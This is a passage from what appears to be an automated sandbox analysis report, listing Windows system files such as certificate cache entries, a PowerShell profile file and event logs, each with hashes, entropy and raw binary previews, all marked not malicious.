Preview:	p...... ....(...w.I tc..(.......2..........+......b..'....................b..'.. ..........fx... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.p.D.q.V.C.b.A.T.U.v.i.Z.V.5.7.H.I.I.u.l.A.%.3.D...

C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	modified
Size (bytes):	330
Entropy (8bit):	3.4240778667196485
Encrypted:	false
SSDEEP:	6:kKQK8O8uScN+SkQlPlEGYRMY9z+4D1QuflIeyGIla1:4K2kPlE99Si1QyIeek
MD5:	7CCBF89C88C9C8727B67206473D61155
SHA1:	E7959203F82928CDBA2B5F1B1D1BEAB3CBF3B814
SHA-256:	620F4F1D0C6F6554A2370A9E3218229ECFCC97DB82CFA65B93FD07B417C94B0F
SHA-512:	30863F12C35A94375DC62EBE9E766BEAE06634811C033F94904800829C71D3F4F4A128979457C51B60D22F606794BCE8550A00B738B1BEC805EA8BE43B1B117E
Malicious:	false
Preview:	p...... ...........Vtc..(...............................................X=.d.... ........B@!........(...........t...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.p.i.n.r.u.l.e.s.s.t.l...c.a.b...".8.0.4.2.4.0.2.1.c.7.d.b.d.2.1.:.0."...

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.9260988789684415
Encrypted:	false
SSDEEP:	3:Nlllulb/lj:NllUb/l
MD5:	13AF6BE1CB30E2FB779EA728EE0A6D67
SHA1:	F33581AC2C60B1F02C978D14DC220DCE57CC9562
SHA-256:	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
SHA-512:	1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
Malicious:	false
Preview:	@...e................................................@..........

C:\Windows\System32\winevt\Logs\Application.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	4192
Entropy (8bit):	3.7065247332309514
Encrypted:	false
SSDEEP:	48:MG++rrP+sXCrPwfFRVEfWb3/OoNwuyTL3WicW4/HSqdrSDFDS3/QwQc:++JCrup/vOoKdLGij4fjoF6/wc
MD5:	E056E7EEEFC64E08EEC12D4E532D9BB8
SHA1:	2FE6DF8359AAF958570D237C6D5641B8D761F62B
SHA-256:	C193A07B4237A29E426E1E8526A0F3E570AB384846DBAE4F91C6A606D8E354C7
SHA-512:	54CF23821B4E5A2EE6E04FCA3136FBF5965F7099EB1167CA23CC64B4C754B6767937A354B6B4419FBB450C1A7A8C77A3BF9EB302C7A246D147B9F2CE7BF27DF5
Malicious:	false
Preview:	ElfChnk.................V.......W...........X...P.....->.....................................................................O,"............................................=...........................................................................................................................g...............@...........................n...................M...]...........................h...................................&...................................~...............................................**..X...V.......%.$.sc........ST,C&.......ST,C..KW.(..%@.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7...F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.S.P.P.F........)...G.u.i.d.....&.{.E.2.3.B.3.3.B.0.-.C.8.C.9.-.4.7.2.C.-.A.5.F.9.-.F.2.B.D.F.E.

C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.6566514459887585
Encrypted:	false
SSDEEP:	384:yhe6UHi2uepX7xasnPC3FzFtpFDhFPFyF842p3wXMcu5aZ:yVUHiapX7xadptrDT9W84IwXMc
MD5:	D90F276209A132AC6DDBD80CD0044AD6
SHA1:	73E1DAB1D925754D2EA3C0CFE16B0348D9FB2687
SHA-256:	A780D890F4F84258E9D6923D6F3DAF8EAD82F1879DC6A53BAF04636ACD178733
SHA-512:	3B912CE093E10A76731796CB7AB5F1174C7D87C66F7BDB77CF2AC415BC34AE06CE989C04BA01DDC91BF9F983B14C392F349198B761DA7B820539D7379799216D
Malicious:	false
Preview:	ElfChnk.........@...............@...........................................................................................,..G................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo..........f........>...;..................**..............4.9...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.390921844362085
Encrypted:	false
SSDEEP:	384:7hlUNQJNC3NiNCNaNmN4NUNTN+NQfNbN9NRNlN0N5NCNJNoNThNrMNTmXNVNmNbt:7OVNLsG71CNUw/QnZNf5D4m5
MD5:	00B5C2BD0BD3617B8B9BED017F53F095
SHA1:	BD409599436A32D771EDDEC31FA8826753F7A9C2
SHA-256:	3A0BF0891BA9B49BE4517A6A4CC0A96C14CFAE5E13072C8BDFD21674FDD437FE
SHA-512:	C34CD25C6DC213A861AE47530327B3267D0CD160627D554F952352A3DB59D0691C2A2F819B8D8ADDA51317396C787B74C23C9DFF60A8D614955B240353135F0D
Malicious:	false
Preview:	ElfChnk.........:...............:...............@..._........................................................................Y.;................<.......................d...=...........................................................................................................................f...............?...........................m...................M...F...................U.......................U...........................MB..........................................&...........E.......}...........**.................b...........x/.&........x/...].l..<.po........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.282965434534458
Encrypted:	false
SSDEEP:	384:+hWVRVGVdlV0V9VXVhMVdVEVsVlV/VRVRVBVwV0VWVaVBP2VVVZVGV+Vxz4beVw+:+XKh+Rmhd4Yha
MD5:	C339EF25CF12400AAE25F0C7B8911064
SHA1:	BE382D9CE45879D1FDEEC44D01A00E9007ADB45F
SHA-256:	597A2DCB697BDB20FAA02E2D4F204F821C11B29D0869650ED0F4CC07EB4AE6A3
SHA-512:	B028E8C344C4028648AC7B2A21C82C8C47AD59BC257E6FE26DCDCF9E4205C29EB5B0D523983223BB7EEB5ED005555B9310E6AFDAF0E3892D2C34D581DDDE45E0
Malicious:	false
Preview:	ElfChnk.v...............v.......................H...".,.....................................................................G..l................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F....................................................4.......................................................j......&.......................q1......**......v..........K...........x/.&........x/...].l..<.po........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.249286143339883
Encrypted:	false
SSDEEP:	384:Mhjm+mskTmdlmMm6mrmgnmWmxm3mkfmH2mHYm4uNbmA7omCqmLKmc2mWmJmZDlmF:MJkC09IrKuN/7oIaCS2ZU3pj/zOg26I
MD5:	53AE748760BE1A52786E0A38E008DEBD
SHA1:	C8F0D9227B8F904A6CC9AAFA18094FBADAD4A2EC
SHA-256:	7C778DD5DEDC65DC73C6DB89D9B3B02CCFA37589A1303EA386DED8065ACE85F1
SHA-512:	8A6CEBB73C110B95755D90D53ABB5E216BE421909059466C27ED8B42561EB356D1570CD01A85E61FCCBAE388F928A747FBE49EDD5A881F60F2CF484C1F87BF97
Malicious:	false
Preview:	ElfChnk.8>......s>......8>......s>...................l.....................................................................M's-................Z...........................=...........................................................................................................................f...............?...........................m...................M...F................................}.......3...-.......................>.................3`..............3.......k8..C+......C]..........C...........**..p...8>.........g...........x/.&........x/...].l..<.po........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.4609818145492177
Encrypted:	false
SSDEEP:	96:eNVaO8sMa3Z85ZMLP3Z85ZW3Z85Z5XrjjY3Z85Zu:oV7pp8nMLPp8nWp8n5bvYp8n
MD5:	5DED8AEF35A3BCAFC3E7775CEAF66614
SHA1:	7FB738DEE2179E2EF480D65A9B5C1748564164DD
SHA-256:	00370FB0FAF76C77AFAEF928BE808F19BE3A66C055F045336BF837B47E2D4E42
SHA-512:	8CDD459F572BD5AF2610B1FC1502A2232511EDC9FFA3D59692186F49D178DD8DA31C8E199E7B1496A3867ABC7266C80D989864C6F345A715BCFDD3968F8C0A0F
Malicious:	false
Preview:	ElfChnk.....................................@.........V.....................................................................G.T.............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&.......f.......**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.478804493448396
Encrypted:	false
SSDEEP:	1536:d8UbBN2A4VD7VAx8whAGU2woJQgh8KHlt1KF9fk:
MD5:	ADB1C70D82087A1E4450CEC41B8315DD
SHA1:	0EF69157FCFB104E049B5F460C4A5DB2B005ABDA
SHA-256:	C6C206C7C074F0B3E19E32FBBC9AC200C7DAF3EF170660788FBEAA11F66937A1
SHA-512:	648149E7D57CCFC20F2647D6835441057ECA262620DC0373F61276D5394B33DFF3232E5CE16F3C4196B809E47A5326B05DDE31AB88A35BE91CD2B8BF24D1CD2A
Malicious:	false
Preview:	ElfChnk.d.......g.......d.......g...............p......5.......................................................................J............................................=...............w...........................................................................................................J...............?...............................................M...F...................................................................................................................................l.......&.......**......d........~...........a..&........a..&..Z.f.~v.S.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8535361098098343
Encrypted:	false
SSDEEP:	384:DhQhjPUjyUCjRj5m/3jfgj7Oj9ij0Aj0b7jHjaj:DmxUVjoubb
MD5:	46991C2FB1310971F3A7C889819BCF08
SHA1:	6A4D5433774E8F45A41850C89F84457734B2C1C2
SHA-256:	242C76F215BFE66F6203395DB17B34FB7CC3B9D0CFE40C5FFB3EA13170F3664A
SHA-512:	D8F8AC6C5FF249D8C3567E591A0F34B158F460E45D4AD98A2C9A01E564B62E197F6BB92C1F104EC2866642C1DDB559CD7A05CE964E71F72801D852627F013217
Malicious:	false
Preview:	ElfChnk......................................"...%....m......................................................................I..................f...........................=...........................................................................................................................f...............?...........................m...................M...F............................................!..............&...........................................................................?...........**..H...........I9.K..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.358169202336039
Encrypted:	false
SSDEEP:	768:mPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9VF3n5RAZ:qXY5nVYIyyqED5BVZUebuMEEoUyrdxF
MD5:	8048BE37E953A75FECD7E9E32858F09B
SHA1:	2810D81F3D3968CCDAE6A48638B37ADA09D74288
SHA-256:	C6554D9A651F50A4EAFCD14036B4193DB7F43A89E4BE9BF17C143182E85B2DD8
SHA-512:	11738838A7C335ABC033AC64166C3A56D43A7B209324FC2B48062DEA4955FFBB031B7D4C6F3070CEA950162AD25E903EECA0F9914298FA12D62591661CAC16C3
Malicious:	false
Preview:	ElfChnk.........v...............v..........................................................................................Eg..................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y.......................*................9..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	modified
Size (bytes):	101120
Entropy (8bit):	2.674425648039825
Encrypted:	false
SSDEEP:	384:4o0KxoboaAioj+yn+oSXoay7oCoayNoQoayfFogoayjhdo69CcoTorNorWorbvo+:PkDC+F8DC+FKsn
MD5:	5131404FCF62DBABE5947FB0674AC5DF
SHA1:	972871803AD0E8D7A87CB35F26014D50168CA830
SHA-256:	5D07A13DB51159B2303FE7E2BFEF69CE7B68F5558124081ABFACD84B80BBFFEB
SHA-512:	24326F032C2B9A601D73C09878E8AE63E5E232C1B014821B5AC11A6EA4231AAD18778EBD740064EB1B089C73C0E6019CB8CB2EF989B3C6B43DE35D2F53643E23
Malicious:	false
Preview:	ElfChnk.....................................8J..pL..O.........................................................................%~................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................=/..............U)..............................**...............2..sc.........x/................................................................>.......V...X.!..e...............2..sc....N....dZN.................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...!>.U)......!>....[.U.....i...........\|...:....A..3...b...%....=.......F.i.l.e.N.a.m.e.L.e.n.g.t.h.......A..3...b...%....=.......F.i.l.e.N

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8219362086936399
Encrypted:	false
SSDEEP:	384:EhAiPA5PNPxPEPHPhPEPmPSPRP3PoPAPm3PJPeP:E2No
MD5:	24BE893550E589F2B6CF7EDFAE2D2685
SHA1:	7847E17F8F485514A7BB207BD675A50BE039F7C3
SHA-256:	BBC4A13C70B4EA896F40CF6058F75DF48D9EDCD67F55DFDE2594C2FB888270EE
SHA-512:	A4C563D677AF49C5C01C9090D0AEA50AD5180921EA79E79DE55B50A617EE1E0A70B72442A950E41341359DC7FCF5426EF9B81DD3B7900F5D938EAA9AB2D0A38B
Malicious:	false
Preview:	ElfChnk......................................#...%..r...........................................................................................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................................'.......................**..x.............\|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8138364083134839
Encrypted:	false
SSDEEP:	384:vhZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+ll:vWXSYieD+tvgzmMveWLIt
MD5:	ED8A14793BFBE62AEA6BC3D09CDE851F
SHA1:	BD890BAADCCA1A171CE5EEDB0881FDD9768D76CC
SHA-256:	90AEB420A769B013B29F9BFE77833B17411BA02C48D8A74943D7B258371EB880
SHA-512:	B5426E1741904FC5E50EA1034DC117AF7FC8945EE4C12A882535B27A53BEDE9D12D02BC6E27B8F8BE8B99E53541ACD20B829107E7C02DEE3E482591DE3D558D0
Malicious:	false
Preview:	ElfChnk......................................#...$...f......................................................................0...................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................&...............................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.971247002956128
Encrypted:	false
SSDEEP:	384:5hqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28E:5bCyhLfIhJ
MD5:	78222796712CD66B480C3402984B5CBF
SHA1:	0D92587952FF6C1A05176BDEFB12C4465C0266E3
SHA-256:	5F2E323F5BA0DA9C3FEA4A501A441B4AD755BE0E39290235A0AD6DE3C3F5214B
SHA-512:	C1C9DF46F5F8CDB1EA3EFA053642BFF8F12503253F515DD0DCE1A1F2C32921D61D7BB596720AE1A79B7485624B93AFDDD62803B44D75F85094323107E1CCF4A4
Malicious:	false
Preview:	ElfChnk.........G...............G...................=.X........................................................................................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n.......................................................~v..............................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.2679867885539506
Encrypted:	false
SSDEEP:	768:NcMhFBuyKskZljdoKXjtT/r18rQXn8e+jDVpM/P:eMhFBuV
MD5:	A7F2575024ED7B8B0C10B02A9786D5AD
SHA1:	9F1B0C4849A285C70FF404F8370D5C9CA7D0E5B3
SHA-256:	4A85BAF632DE65BF837F5F5BF0F70286BA8713034B382F424D09021B0D86B2A3
SHA-512:	FF84D6D914B9FA7A85017E471715DAF71305FA4E5FA75A252E37059FD2434DE8A214E0004572AB819568387B6CA68148C3384B5D9463DA452AF20B71A914A0D5
Malicious:	false
Preview:	ElfChnk.........K...............K........... ...x.............................................................................g.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A..........................................**..x...........,.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.5855848458636738
Encrypted:	false
SSDEEP:	96:9KNVaO8goQqwcnPnzAIYcsVvxwcsVocaDZcaDj7csVAcaD:98V7BBcnPn7Yc+wcvcaFcazcTca
MD5:	2C1895D160B5626D172805E14CC5A71B
SHA1:	4C8AE2B1C2C29819AFCC349A5BF95383A0C257A1
SHA-256:	85D269B929E6600FC73733573242D2E4A125731F4975A88EE70FBD5D2447A476
SHA-512:	904CCFCE084ECC955E3BEE5E5F5143BF3C4F4D60C8804B808A7BA691E79FD214BC42ED3A798F94CDDAEEE1B13892B61B02EECB3BB7C35E9430CA62ABC186302E
Malicious:	false
Preview:	ElfChnk.w.......}.......w.......}...................:Q A.......................................................................Y................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................................................&...............................**..@...w......................x/.&........x/...].l..<.po........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.8876101255809368
Encrypted:	false
SSDEEP:	384:ah1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDm:aMAP1Qa5AgfQQIe
MD5:	94720B3DFFF01D26D6326678848D94A3
SHA1:	7D5A3D0D2831D5CB18C006152CA89C5529C26591
SHA-256:	207D4CE558B60A4575D25705D56CD93D02F000F55E923F98B83397E06C14E787
SHA-512:	1785EBA3BBD518A340AE1C4DE72C34F1DCF27B9FCC5911C340A781362A0F4F4BD07B0B0101B4D31CAECA138A8A5E1491EDC6CC11963C1D3E1FA4DD6D660015C8
Malicious:	false
Preview:	ElfChnk......................................]...`..GC..........................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&...............U..............................**..x...........HD................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.444613084832409
Encrypted:	false
SSDEEP:	384:7hTEVgEYEREgJEkEAEOElEAAjEXsEcAE+ESEAEuEAsTEnV+EkE8EyKEvEosUFECR:7FAUoqsN5TDyYDIyV6GgB2fDWnmz
MD5:	FC433496E2A67B75BD7D70A828B2E0E9
SHA1:	DA6B55E62F542242CB70261D1FCD41E0D8B904C2
SHA-256:	B822B0191E6BCC40D169D4D94C97787D64945DB7B756EAC720383B4738B9611A
SHA-512:	0E9CF7DB301D94461DD11BBD27D58845AB58C09F3B6DA6825773191F901D38050DFEA6FDA531C885BD1E0842DDBB65D329FD7E3B387004EC16274D00CD601E38
Malicious:	false
Preview:	ElfChnk.s...............s....................f...h...........................................................................hU.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F........................................3..5$...................7...........;..m9.......5..%?..........u&....... ..&.......................]-......**......s........+.z...........x/.&........x/...].l..<.po........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
